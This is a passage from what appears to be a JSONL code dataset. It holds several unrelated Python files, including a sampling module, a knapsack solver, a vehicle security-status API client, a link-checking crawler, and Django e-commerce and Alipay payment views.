'$(Platform)\\'==\\'Release|Win32\\'\"]'\n item_rel_x64 = \\\n '//ns:ItemDefinitionGroup[@Condition=\"\\'$(Configuration)|' \\\n '$(Platform)\\'==\\'Release|x64\\'\"]'\n\n itemdefinitiongroups = {\n 'debug': {\n 'x86': item_deb_x86,\n 'x64': item_deb_x64,\n },\n 'release': {\n 'x86': 
item_rel_x86,\n 'x64': item_rel_x64\n }\n }\n\n return itemdefinitiongroups[target][platform]\n\n\ndef get_cmake_lists(cmake_path=None):\n \"\"\"\n Create CMakeLists.txt file in wanted \"cmake_path\"\n\n :param cmake_path: path where CMakeLists.txt should be write\n :type cmake_path: str\n :return: cmake file wrapper opened\n :rtype: _io.TextIOWrapper\n \"\"\"\n\n if not cmake_path:\n send('CMakeLists will be build in current directory.', '')\n cmake = open('CMakeLists.txt', 'w')\n else:\n send('CmakeLists.txt will be build in : ' + str(cmake_path), 'warn')\n if cmake_path[-1:] == '/' or cmake_path[-1:] == '\\\\':\n cmake = open(str(cmake_path) + 'CMakeLists.txt', 'w')\n else:\n cmake = open(str(cmake_path) + '/CMakeLists.txt', 'w')\n\n return cmake\n","sub_path":".local/lib/python3.6/site-packages/cmake_converter/data_files.py","file_name":"data_files.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222257468","text":"import math\r\nimport numpy as np\r\nimport pdb\r\n\r\n#==========================================================================================================================================\r\n# SamplingError Class\r\n#==========================================================================================================================================\r\nclass SamplingError(Exception):\r\n def __init__(self, message: str, samplingMode: str, innerSetCount: int, outerSetCount: int):\r\n \r\n prompt = \"\\nSampling Error: \" + message\r\n prompt += \"\\n\\tSampling Strategy: \" + samplingMode\r\n prompt += \"\\n\\tInner Set: \" + str(innerSetCount)\r\n prompt += \"\\n\\tOuter Set: \" + str(outerSetCount)\r\n \r\n super(SamplingError, self).__init__(prompt)\r\n \r\n#------------------------------------------------------------------------------------------------------------------------------------------\r\n# sample Method\r\n#------------------------------------------------------------------------------------------------------------------------------------------\r\ndef sample(population: dict, innerSet: set, outerSet: set, getProbability, samplingStrategy: str = '', sampleSize: int = 1) -> list:\r\n \"\"\" \r\n Method: \r\n \r\n list sample\r\n (\r\n dict population,\r\n set innerSet,\r\n set outerSet\r\n Function: float getProbability(S item),\r\n string samplingMode,\r\n int sampleSize\r\n )\r\n \r\n Description: \r\n This method generates a random sample of items of type S from a population. The inner and outer sets are subsets of the population, \r\n and can be used to narrow the pool of candididate items. A list of keys of type T is returned.\r\n Five sampling strategies can be selected from:\r\n (1) Cut-off: \r\n All items in the inner set of the population are assigned an inclusion probability of 1. All items outside of \r\n the inner set but inside the outer set are assigned an inclusion probability of 0.\r\n (2) Proportional:\r\n All items are assigned an inclusion probability via the getProbability function.\r\n (3) Top Proportional:\r\n All items in the inner set of the population are assigned an inclusion probability via the getProbability function. \r\n All items outside of the inner set but inside the outer set are assigned an inclusion probability of 0.\r\n (4) Random: \r\n All items in the population are assigned an inclusion probability of 1. 
Default strategy.\r\n \r\n Arguments:\r\n dict population:\r\n A dictionary mapping generic items of type S to unique keys of type T.\r\n set innerSet:\r\n Set of item IDs belonging to the population. The inner set is a subset of the outer set.\r\n set outerSet:\r\n Set of item IDs belonging to the population.\r\n Function: float getProbability(S item):\r\n A function that accepts a generic item of type S and returns a floating point inclusion probability.\r\n string samplingStrategy:\r\n A string flag that describes what sampling strategy is to be applied.\r\n Values:\r\n := 'cutoff' : applies the cut-off sampling strategy\r\n := 'proportional' : applies the proportional sampling strategy\r\n := 'top_proportional' : applies the top proportional strategy\r\n int sampleSize:\r\n Size of the sample. \r\n \r\n Output:\r\n list\r\n \"\"\"\r\n \r\n # If the population size is empty, raise a Sampling Error\r\n if len(population) == 0:\r\n pdb.set_trace()\r\n raise SamplingError(\"The population dict is empty.\", samplingStrategy, len(innerSet), len(outerSet))\r\n \r\n # Apply the chosen sampling strategy to construct a subpopulation and a probability vector\r\n \r\n # Case 1: Cut-off sampling.\r\n if samplingStrategy == 'cutoff':\r\n subPopulation = list(innerSet)\r\n probabilities = None\r\n \r\n # Case 2: Proportional sampling.\r\n elif samplingStrategy == 'proportional':\r\n # innerSet|outerSet returns the union of the inner set and the outer set\r\n subPopulation, probabilities = proportionalSampling(population, innerSet|outerSet, getProbability)\r\n \r\n # Case 3: Top proportional sampling.\r\n elif samplingStrategy == 'top_proportional':\r\n subPopulation, probabilities = proportionalSampling(population, innerSet, getProbability)\r\n \r\n # Case 4: Random sampling.\r\n else:\r\n subPopulation = list(outerSet)\r\n probabilities = None\r\n \r\n # If the subpopulation size is empty, raise a Sampling Error\r\n if len(subPopulation) == 0:\r\n raise SamplingError(\"The sub-population is empty.\", samplingStrategy, len(innerSet), len(outerSet))\r\n \r\n # Case 1: The probability vector is empty.\r\n if probabilities == None:\r\n # All items are given an equal inclusion probability.\r\n sampleArray = np.random.choice(subPopulation, sampleSize)\r\n \r\n # Case 2: The probability vector is not empty.\r\n else:\r\n try:\r\n \r\n # Normalize the probability vector such that the sum of the vector's elements is 1\r\n pSum = sum(probabilities)\r\n \r\n # Case 2.1: The sum of all elements is 0 or is infinity.\r\n if pSum == 0 or pSum == math.inf:\r\n # All items are given an equal inclusion probability.\r\n weight = 1 / len(subPopulation)\r\n probabilities = [weight for a in range(len(subPopulation))]\r\n \r\n # Case 2.2: The sum of all elements is a non-zero real number.\r\n else:\r\n probabilities = list(map(lambda x: x / pSum, probabilities))\r\n \r\n # Construct a random sample of items\r\n sampleArray = np.random.choice(subPopulation, sampleSize, p=probabilities)\r\n \r\n except ZeroDivisionError as e:\r\n pdb.set_trace()\r\n \r\n return list(sampleArray)\r\n \r\n#------------------------------------------------------------------------------------------------------------------------------------------\r\n# proportionalSampling Method\r\n#------------------------------------------------------------------------------------------------------------------------------------------ \r\ndef proportionalSampling(population: dict, itemSet: set, getProbability) -> tuple:\r\n \r\n \"\"\"\r\n Method:\r\n \r\n 
tuple<list<T>, list<float>> proportionalSampling\r\n (\r\n dict population,\r\n set itemSet,\r\n Function: float getProbability(S item) \r\n )\r\n \r\n Description:\r\n Assigns an inclusion probability to all items in the set via the getProbability function.\r\n \r\n Arguments:\r\n dict population:\r\n A dictionary of generic items of type S mapped to keys of type T.\r\n set itemSet:\r\n A set of item keys of type T.\r\n Function: float getProbability(S item)\r\n \r\n Output:\r\n tuple<list<T>, list<float>> { subPopulation, probabilities }\r\n subPopulation: A list of item keys of type T\r\n probabilities: A list of floating point probabilities\r\n \"\"\"\r\n \r\n subPopulation = []\r\n probabilities = []\r\n \r\n for ID in itemSet:\r\n subPopulation.append(ID)\r\n probabilities.append(getProbability(population[ID]))\r\n \r\n return subPopulation, probabilities","sub_path":"sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":7685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311398480","text":"'''\n0 1 Knapsack - Problem\nA thief robbing a store can carry a maximal weight of W into his knapsack. There are N items, and the i-th item weighs 'Wi' and has value 'Vi'. What would be the maximum value V that the thief can steal?\n'''\nfrom sys import stdin\n\ndef knapsack(weights, values, n, maxWeight) :\n K=[[0 for x in range(maxWeight+1)] for x in range(n+1)]\n for i in range(n+1):\n for w in range(maxWeight+1):\n if i==0 or w==0:\n K[i][w]=0\n elif weights[i-1]<=w:\n K[i][w]=max(values[i-1]+K[i-1][w-weights[i-1]],K[i-1][w])\n else:\n K[i][w]=K[i-1][w]\n return K[n][maxWeight]\ndef takeInput() :\n n = int(stdin.readline().rstrip())\n\n if n == 0 :\n return list(), list(), n, 0\n\n weights = list(map(int, stdin.readline().rstrip().split(\" \")))\n values = list(map(int, stdin.readline().rstrip().split(\" \")))\n maxWeight = int(stdin.readline().rstrip())\n\n return weights, values, n, maxWeight\n\n\n#main\nweights, values, n, maxWeight = takeInput()\n\nprint(knapsack(weights, values, n, maxWeight))","sub_path":"algorithms/Python/dynamic_programming/0 1 Knapsack .py","file_name":"0 1 Knapsack .py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"357536142","text":"import requests\nfrom lib.settings import baseUrlSettings\nfrom lib.logger import logger\n\nclass VehicleSecurityInfo:\n\tdef getGMVehicleSecurityInfo(self, vehicleId):\n\t\theader = {\n\t\t\t\"Content-Type\": \"application/json\"\n\t\t}\n\t\tpayload = {\n\t\t\t\"id\": vehicleId,\n\t\t\t\"responseType\": \"JSON\"\n\t\t}\n\t\turl = baseUrlSettings()\n\t\tif url is None:\n\t\t\t# Unable to fetch URL from env file. Return error\n\t\t\tlogger.error(\"Unable to fetch URL from env file\")\n\t\t\treturn {\"status\": False}\n\t\ttry:\n\t\t\turl += \"/getSecurityStatusService\"\n\t\t\tr = requests.post(url=url, json=payload, headers=header)\n\t\t\tif r.status_code != 200:\n\t\t\t\t# Invalid response code. 
Return error\n\t\t\t\tlogger.error(\"Invalid response code for GM API /getSecurityStatusService :: STATUS -> %s, RESPONSE -> %s\" % (r.status_code, r.text))\n\t\t\t\treturn {\"status\": False}\n\n\t\t\t# Success in getting data from GM\n\t\t\tr = r.json()\n\t\t\tlogger.debug(\"Data for vehicleId %s is %s\" % (vehicleId, r))\n\n\t\t\tresult = []\n\t\t\t# Process the response to form result\n\t\t\t\"\"\"\n\t\t\tSample response from GM is as follows:\n\t\t\t{\n\t\t\t \"service\": \"getSecurityStatus\",\n\t\t\t \"status\": \"200\",\n\t\t\t \"data\": {\n\t\t\t \"doors\": {\n\t\t\t \"type\": \"Array\",\n\t\t\t \"values\": [\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"frontLeft\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"False\"\n\t\t\t }\n\t\t\t },\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"frontRight\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"True\"\n\t\t\t }\n\t\t\t },\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"backLeft\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"False\"\n\t\t\t }\n\t\t\t },\n\t\t\t {\n\t\t\t \"location\": {\n\t\t\t \"type\": \"String\",\n\t\t\t \"value\": \"backRight\"\n\t\t\t },\n\t\t\t \"locked\": {\n\t\t\t \"type\": \"Boolean\",\n\t\t\t \"value\": \"True\"\n\t\t\t }\n\t\t\t }\n\t\t\t ]\n\t\t\t }\n\t\t\t }\n\t\t\t}\n\t\t\t\"\"\"\n\t\t\tfor val in r[\"data\"][\"doors\"][\"values\"]:\n\t\t\t\tx = {\n\t\t\t\t\t\"location\": val[\"location\"][\"value\"],\n\t\t\t\t\t\"locked\": val[\"locked\"][\"value\"] == \"True\"  # GM encodes booleans as strings; bool(\"False\") would be truthy\n\t\t\t\t}\n\t\t\t\tresult.append(x)\n\t\t\treturn {\"status\": True, \"result\": result}\n\t\t\n\t\texcept Exception as e:\n\t\t\t# Exception while calling/processing GM API\n\t\t\tlogger.critical(\"Exception :: %s\" % e)\n\t\t\treturn {\"status\": False}\n","sub_path":"models/VehicleSecurityInfo.py","file_name":"VehicleSecurityInfo.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56049993","text":"\nfrom dao import dbconnection\nclass Task:\n def __init__(self, taskid, taskname, description, status, priority, notes, bookmark, ownerid, creatorid, createdon,\n modifiedon):\n self.taskid = taskid\n self.taskname = taskname\n self.description = description\n self.status = status\n self.priority = priority\n self.notes = notes\n self.bookmark = bookmark\n self.ownerid = ownerid\n self.creatorid = creatorid\n self.createdon = createdon\n self.modifiedon = modifiedon\n dbconnection.insert(taskid, taskname, description, status, priority, notes, bookmark, ownerid, creatorid,\n createdon, modifiedon)\n\n","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"150567949","text":"# -*- coding: GBK -*-\nimport conf\nimport request\nimport logging\nimport urlparse\nimport util\n\n\ndef _is_home_page(url):\n ent = url.split(u'/')\n if len(ent) <= 3:\n return True\n if len(ent) == 4:\n if len(ent[3]) == 0:\n return True\n if ent[3] == u'index' or ent[3] == u'index.html' or ent[3] == u'index.shtml' or ent[3] == u'index.php':\n return True\n return False\n\n\ndef _home_page_resp(req):\n err, msg = request.code_msg.get(u'r_t_h_p')\n resp = req.get_resp()\n resp.code, resp.msg = err, msg\n logging.info('find 
dead: [target_url:%s][cur_url:%s] code: %d, msg: %s' %\n (req.target_url, req.cur_url, resp.code, resp.msg))\n return resp\n\n\ndef judge(site_conf, req):\n # TO REMOVE\n # req = request.Request()\n if req.cur_url and req.target_url != req.cur_url:\n for rule in site_conf.rules:\n if isinstance(rule, conf.SiteConf.Rule) and rule.method == u'link':\n ret = rule.check_match(req.cur_url)\n if ret:\n err, msg = request.code_msg.get(u'url_match')\n resp = req.get_resp()\n resp.code = err\n resp.msg = msg % rule.match_str()\n logging.info('find dead: [target_url:%s][cur_url:%s] code: %d, msg: %s' %\n (req.target_url, req.cur_url, resp.code, resp.msg))\n return resp\n if _is_home_page(req.cur_url):\n return _home_page_resp(req)\n # return req.get_resp()\n if req.http_code < 0:\n logging.error('do not init http code, please init it')\n return req.get_resp()\n hc = req.http_code / 100\n location = req.headers.get(u'location')\n if hc != 3 or not location:\n return req.get_resp()\n # some server response Relative URL, so need to rebase it\n if location[0:7] != u'http://' and location[0:8] != u'https://':\n location_new = urlparse.urljoin(req.cur_url, location)\n logging.info('rebase location [%s] -> [%s]' % (location, location_new))\n location = location_new\n for rule in site_conf.rules:\n if isinstance(rule, conf.SiteConf.Rule) and rule.method == u'link':\n ret = rule.check_match(location)\n if ret:\n err, msg = request.code_msg.get(u'redirect_url_match')\n resp = req.get_resp()\n resp.code = err\n resp.msg = msg % rule.match_str()\n logging.info('find dead: [target_url:%s][cur_url:%s] code: %d, msg: %s' %\n (req.target_url, req.cur_url, resp.code, resp.msg))\n return resp\n if _is_home_page(location):\n return _home_page_resp(req)\n resp = util.need_crawl_next(req)\n if resp is not None:\n logging.info('need_crawl: [target_url:%s][next_url:%s, http_method: %s] code: %d, msg: %s' %\n (req.target_url, resp.next_url, resp.http_method, resp.code, resp.msg))\n return resp\n return req.get_resp()\n","sub_path":"cherrypick/4look/bin/dc/dc_link.py","file_name":"dc_link.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"639017224","text":"#endpoints\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom ecomerce_turing.models.models import Product, ProductCategory, Category, Department, Review, Customer\nfrom django.db.models import Q\nfrom rest_framework.decorators import api_view\nfrom .errors import *\nfrom .customers import verify_token\nimport datetime\nfrom django.utils import timezone\nfrom django.views.decorators.cache import cache_page\n\n#products\n#Get All Products, or\n#Product by ID, or\n#Get a list of Products of Categories, or\n#Get a list of Products on Department\n@api_view(['GET'])\n@cache_page(60 * 15) #cahce product data for 15 minutes\ndef products(request, product_id=0, category_id=0, department_id=0):\n if (product_id==0):\n #all products\n try:\n page = int(request.GET.get(\"page\"))\n if (page<1): page=1\n except:\n page = 1\n try:\n limit = int(request.GET.get(\"limit\"))\n if (limit<1): limit=20\n except:\n limit = 20\n try:\n description_length = int(request.GET.get(\"description_length\"))\n if (description_length<1): description_length = 200\n except:\n description_length = 200\n if (department_id!=0):\n total_count = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(\n 
category_id__in=Category.objects.filter(department_id=department_id).values(\"category_id\")\n ).values(\"product_id\")\n ).count()\n elif(category_id!=0):\n total_count = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(category_id=category_id).values(\"product_id\")\n ).count()\n else:\n total_count = Product.objects.all().count()\n start_item = (page -1 ) * limit\n end_item = start_item + limit\n rows = []\n if (start_item<=total_count):\n if end_item>total_count: end_item = total_count\n if (department_id!=0):\n p = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(\n category_id__in=Category.objects.filter(department_id=department_id).values(\"category_id\")\n ).values(\"product_id\")\n ).order_by('product_id')[start_item:end_item]\n elif(category_id!=0):\n p = Product.objects.filter(\n product_id__in=ProductCategory.objects.filter(category_id=category_id).values(\"product_id\")\n ).order_by('product_id')[start_item:end_item]\n else:\n p = Product.objects.all().order_by('product_id')[start_item:end_item]\n for i, c in enumerate(p):\n rows.append({\n \"product_id\": c.product_id,\n \"name\": c.name,\n \"description\": c.description[:description_length],\n \"price\": c.price,\n \"discounted_price\": c.discounted_price,\n \"thumbnail\": c.thumbnail\n })\n return JsonResponse({\"count\": total_count, \"rows\": rows}, safe=False)\n else:\n #single product\n try:\n p = Product.objects.get(product_id=product_id)\n product = {\n \"product_id\": p.product_id,\n \"name\": p.name,\n \"description\": p.description,\n \"price\": p.price,\n \"discounted_price\": p.discounted_price,\n \"image\": p.image,\n \"image2\": p.image_2,\n \"thumbnail\": p.thumbnail,\n \"display\": p.display\n }\n return JsonResponse(product, safe=False)\n except:\n return error(404, \"PRD_01\")\n\n\n\n#Search Products\n@api_view(['GET'])\n@cache_page(60 * 15)\ndef search(request):\n string = request.GET.get(\"query_string\")\n if (string==None):\n return error(400, \"USR_02\")\n try:\n page = int(request.GET.get(\"page\"))\n if (page<1): page=1\n except:\n page = 1\n try:\n limit = int(request.GET.get(\"limit\"))\n if (limit<1): limit=20\n except:\n limit = 20\n try:\n description_length = int(request.GET.get(\"description_length\"))\n if (description_length<1): description_length = 200\n except:\n description_length = 200\n all_words = request.GET.get(\"all_words\")\n if (all_words!=\"off\"): all_words = \"on\"\n if (all_words == \"on\"):\n total_count = Product.objects.filter(\n Q(name__contains=string) | \n Q(description__contains=string)).count()\n else:\n total_count = Product.objects.filter(name__contains=string).count()\n start_item = (page -1 ) * limit\n end_item = start_item + limit\n rows = []\n if (start_item<=total_count):\n if end_item>total_count:\n end_item = total_count\n if (all_words == \"on\"):\n p = Product.objects.filter(\n Q(name__contains=string) | \n Q(description__contains=string)\n ).order_by('product_id')[start_item:end_item]\n else:\n p = Product.objects.filter(\n name__contains=string\n ).order_by('product_id')[start_item:end_item]\n for i, c in enumerate(p):\n rows.append({\n \"product_id\": c.product_id,\n \"name\": c.name,\n \"description\": c.description[:description_length],\n \"price\": c.price,\n \"discounted_price\": c.discounted_price,\n \"thumbnail\": c.thumbnail\n })\n return JsonResponse({\"count\": total_count, \"rows\": rows}, safe=False) \n\n\n#Get details of a Product\n@api_view(['GET'])\n@cache_page(60 * 15)\ndef details(request, 
product_id):\n try:\n p = Product.objects.get(product_id=product_id)\n product = {\n \"product_id\": p.product_id,\n \"name\": p.name,\n \"description\": p.description,\n \"price\": p.price,\n \"discounted_price\": p.discounted_price,\n \"image\": p.image,\n \"image2\": p.image_2,\n }\n return JsonResponse(product, safe=False)\n except:\n return error(404, \"PRD_01\")\n\n\n#Get locations of a Product\n@api_view(['GET'])\n@cache_page(60 * 15)\ndef locations(request, product_id):\n p = ProductCategory.objects.filter(product_id=product_id).values(\"category_id\")\n c = Category.objects.filter(category_id__in=p)\n rows = []\n for i, c in enumerate(c):\n rows.append({\n \"category_id\": c.category_id,\n \"category_name\": c.name,\n \"department_id\": c.department_id,\n \"department_name\": Department.objects.get(department_id=c.department_id).name\n })\n if (len(rows)==0): return error(404, \"PRD_01\")\n return JsonResponse(rows, safe=False)\n\n\n#Post/Get reviews of a Product\n@api_view(['GET','POST'])\n@cache_page(60 * 15)\ndef reviews(request, product_id):\n if (request.method==\"GET\"):\n #get reviews\n r = Review.objects.filter(product_id=product_id).order_by(\"-created_on\")\n rows = []\n \n for i, c in enumerate(r):\n customer = Customer.objects.get(customer_id=c.customer_id)\n rows.append({\n \"name\": customer.name,\n \"review\": c.review,\n \"rating\": c.rating,\n \"created_on\": str(c.created_on)[0:19]\n })\n return JsonResponse(rows, safe=False)\n else:\n #post reviews\n verify_tk, response = verify_token(request.headers)\n if verify_tk:\n customer_id = response[\"customer_id\"]\n else:\n return response\n rating = request.POST.get(\"rating\")\n review = request.POST.get(\"review\")\n if rating == None: return error(400, \"USR_10\", \"rating\")\n if review == None: return error(400, \"USR_10\", \"review\")\n try:\n rating = int(rating)\n if (rating<1 or rating>5): return error(400, \"USR_11\", \"rating\")\n except:\n return error(400, \"USR_11\", \"rating\")\n if (len(review)<5): return error(400, \"USR_11\", \"review\")\n try:\n product = Product.objects.get(product_id=product_id)\n except:\n return error(404, \"PRD_01\")\n r = Review(\n customer_id = customer_id,\n product_id = product.product_id,\n review = review,\n rating = rating,\n created_on = timezone.now()\n )\n r.save()\n return JsonResponse({}) \n","sub_path":"ecomerce_turing/app/api/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":8774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"338096208","text":"from django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_POST\nfrom payment import creat_payment_url, notify_alipay_action, return_alipay_action\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.models import User, Group\nfrom django.core.urlresolvers import reverse\nfrom account import common as Common\nfrom account.servercontrol import ServerControl\nfrom account.shipping import shipping, shipping_gift\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom time import time\nfrom django.contrib.auth import *\nfrom models import *\nimport logging\nimport random\nimport json\nfrom pprint import pprint\n# Create your views here.\n\n\ndef option():\n p = Option.objects.all()\n tmp = {}\n for i in p:\n tmp[i.key] = i.value\n return tmp\n\n\ndef clac_check_no(des_no):\n ran = 
random.sample(range(5), 3)\n des = des_no[-5:]\n tmp = ''\n for i in range(5):\n if i in ran:\n tmp += chr(int(des[i]) + 65)\n else:\n tmp += des[i]\n tmp = tmp.replace('I', 'Z')\n tmp = tmp.replace('1', 'Y')\n tmp = tmp.replace('0', 'X')\n tmp = tmp.replace('O', 'W')\n return tmp\n\n\ndef _pay(request, user_game_id):\n host = 'http://' + request.get_host()\n return_url = host + reverse('account:alipay_return', args=(user_game_id,))\n notify_url = host + reverse('account:alipay_notify', args=(user_game_id,))\n p = option()\n if request.method == 'GET':\n dpo_id = int(request.GET.get('dpo_id'))\n dpo = get_object_or_404(DirectPaymentOrder, pk=dpo_id)\n if request.method == 'POST':\n ug = get_object_or_404(UserGame, pk=user_game_id)\n paymentgood_id = int(request.POST.get('paymentgood'))\n paymentgood = get_object_or_404(PaymentGood, pk=paymentgood_id)\n count = int(request.POST.get('count'))\n money = paymentgood.price * count\n if user_game_id == int(p['gift_user_game_id']):\n email = request.POST.get('email')\n uid = 10000\n remarks = email\n else:\n zone = int(request.POST.get('zone'))\n uid = int(request.POST.get('uid'))\n remarks = str([zone, uid])\n number = str(int(time()*100)) + '0' + str(uid)\n dpo = DirectPaymentOrder(\n number=number,\n user_game=ug,\n paymentgood=paymentgood,\n money=money,\n created_date=timezone.now(),\n status='obligation',\n remarks=remarks,\n uid=uid,\n )\n dpo.save()\n pay_data = {\n 'return_url': return_url,\n 'notify_url': notify_url,\n 'dpo': dpo,\n }\n return pay_data\n\n\ndef view_template_base(request, url):\n sub_menu = Common.get_user_sub_menu(request.user, url)\n menus = Common.get_user_menus(request.user)\n games = Game.objects.all()\n user_games = request.user.usergame_set.all()\n p = option()\n\n data = {\n 'title': sub_menu.label,\n 'menus': menus,\n 'games': games,\n 'user_games': user_games,\n 'page': url,\n 'option': p,\n }\n\n return data\n\n\n@Common.competence_required\ndef account(request, url='information'):\n t = \"account/account.html\"\n data = view_template_base(request, url)\n return render(request, t, data)\n\n\n@Common.competence_required\ndef order(request, url='order'):\n t = \"account/order.html\"\n data = view_template_base(request, url)\n dpos = DirectPaymentOrder.objects.filter(user_game__user__exact=request.user)[:50]\n groups = request.user.groups.all()\n if len(filter(lambda x: x.name == 'SERVICE', groups)) > 0:\n p = option()\n user_game_id = int(p['donate_user_game_id'])\n dpos = DirectPaymentOrder.objects.filter(user_game__id=user_game_id)[:50]\n data['dpos'] = dpos\n return render(request, t, data)\n\n\n@Common.competence_required\ndef bind(request, game_id, url='information'):\n t = \"account/bind.html\"\n data = view_template_base(request, url)\n game = get_object_or_404(Game, pk=game_id)\n servers = game.server_set.all()\n data['game'] = game\n data['servers'] = servers\n if request.method == 'POST':\n uid = int(request.POST.get('uid'))\n server_id = int(request.POST.get('server'))\n p = option()\n server = get_object_or_404(Server, pk=server_id)\n ugs = request.user.usergame_set.filter(game=game, server=server)\n if len(ugs) > 0:\n ug = ugs[0]\n if ug.check == request.POST.get('check'):\n ug.bind_date = timezone.now()\n ug.status = 1\n ug.save()\n return HttpResponseRedirect(\n reverse('account:usergame', args=(ug.id,)))\n else:\n data['check_is_wrong'] = True\n data['uid'] = uid\n else:\n data['never_ug'] = True\n data['uid'] = uid\n return render(request, t, 
data)\n\n\n@require_POST\n@Common.competence_required\ndef send_check_mail(request):\n game_id = int(request.POST.get('game_id'))\n server_id = int(request.POST.get('server_id'))\n uid = int(request.POST.get('uid'))\n if uid is None or game_id is None or server_id is None:\n return HttpResponse(status=401)\n game = get_object_or_404(Game, pk=game_id)\n server = get_object_or_404(Server, pk=server_id)\n p = option()\n ss = ServerControl(server, uid, p)\n base_info = ss.base_info()\n ugs = request.user.usergame_set.filter(game=game, server=server)\n if len(ugs) > 0:\n ug = ugs[0]\n if (timezone.now() - ug.created_date) < timedelta(seconds=100):\n return HttpResponse(status=401)\n ug.created_date = timezone.now()\n else:\n ug = UserGame(\n user=request.user,\n game=game,\n server=server,\n uin=base_info.get('uin'),\n check=clac_check_no(str(uid)),\n created_date=timezone.now())\n ug.save()\n if int(base_info.get('total_recharge')) < int(p.get('vip', 60)):\n response_id = 0\n else:\n response_id = ss.send_mail(ug.check)\n logger = logging.getLogger(__name__)\n logger.info('Send Check Mail {0} To {1}'.format(response_id, uid))\n tmp = {'result': response_id}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n\n\n@Common.competence_required\ndef usergame(request, user_game_id, url='information'):\n p = option()\n t = \"account/usergame.html\"\n data = view_template_base(request, url)\n ug = get_object_or_404(UserGame, pk=user_game_id)\n data['usergame'] = ug\n data['game'] = ug.game\n data['zones'] = ug.server.zone_set.all()\n data['paymentgoods'] = ug.game.paymentgood_set.filter(anyone=0)\n data['paymentgoodsanyone'] = ug.game.paymentgood_set.filter(anyone=1)\n ss = ServerControl(ug.server, 0, option())\n base_info = ss.get_player_world_info(ug.uin)\n data['world_info'] = base_info\n data['min_donate'] = p['min_donate']\n return render(request, t, data)\n\n\n@require_POST\n@Common.competence_required\ndef shippingview(request, dpo_number):\n if shipping(dpo_number):\n tmp = {'result': 0}\n else:\n tmp = {'result': 1}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n\n\n@Common.competence_required\ndef pay(request, user_game_id):\n pay_data = _pay(request, user_game_id)\n p = option()\n freepay = p['freepay'].split(',')\n if str(request.user.id) in freepay:\n shipping(pay_data['dpo'].number, True)\n return HttpResponseRedirect(reverse('account:order'))\n url = creat_payment_url(pay_data, request.META['HTTP_USER_AGENT'])\n return HttpResponseRedirect(url)\n\n\n@require_POST\n@csrf_exempt\ndef alipay_notify(request, user_game_id):\n p = option()\n logger = logging.getLogger(__name__)\n number = request.POST.get('out_trade_no')\n if notify_alipay_action(request):\n logger.info('Notify Success : {0}'.format(number))\n if int(user_game_id) == int(p['gift_user_game_id']):\n shipping_gift(number)\n else:\n shipping(number)\n return HttpResponse(\"success\")\n else:\n logger.info('Notify Fail : {0}'.format(number))\n return HttpResponse(\"fail\")\n\n\n@Common.competence_required\ndef alipay_return(request, user_game_id):\n p = option()\n logger = logging.getLogger(__name__)\n number = request.GET.get('out_trade_no')\n if return_alipay_action(request):\n logger.info('Return Success : {0}'.format(number))\n if int(user_game_id) == int(p['gift_user_game_id']):\n # shipping_gift(number)\n url = reverse('thankyou') + '?number=' + number\n return HttpResponseRedirect(url)\n else:\n shipping(number)\n 
else:\n logger.info('Return Fail : {0}'.format(number))\n return HttpResponseRedirect(reverse('account:order'))\n\n\n@require_POST\ndef uid(request, uid):\n p = option()\n user_game_id = int(p['donate_user_game_id'])\n ug = get_object_or_404(UserGame, pk=user_game_id)\n ss = ServerControl(ug.server, int(uid), p)\n try:\n base_info = ss.base_info()\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.error('Get UID Exception : {0}|{1}'.format(uid, e))\n tmp = {'result': 1}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n tmp = {\n 'result': 0,\n 'name': base_info['name'],\n 'zone': base_info['world_id']}\n ret = json.dumps(tmp, ensure_ascii=False)\n return HttpResponse(ret, content_type='application/json')\n\n\ndef donate(request):\n t = \"account/donate.html\"\n p = option()\n data = {'option': p, }\n user_game_id = int(p['donate_user_game_id'])\n ug = get_object_or_404(UserGame, pk=user_game_id)\n data['paymentgoods'] = ug.game.paymentgood_set.filter(anyone=0)\n data['paymentgoodsanyone'] = ug.game.paymentgood_set.filter(anyone=1)\n data['min_donate'] = p['min_donate']\n return render(request, t, data)\n\n\ndef donate_pay(request):\n p = option()\n user_game_id = int(p['donate_user_game_id'])\n pay_data = 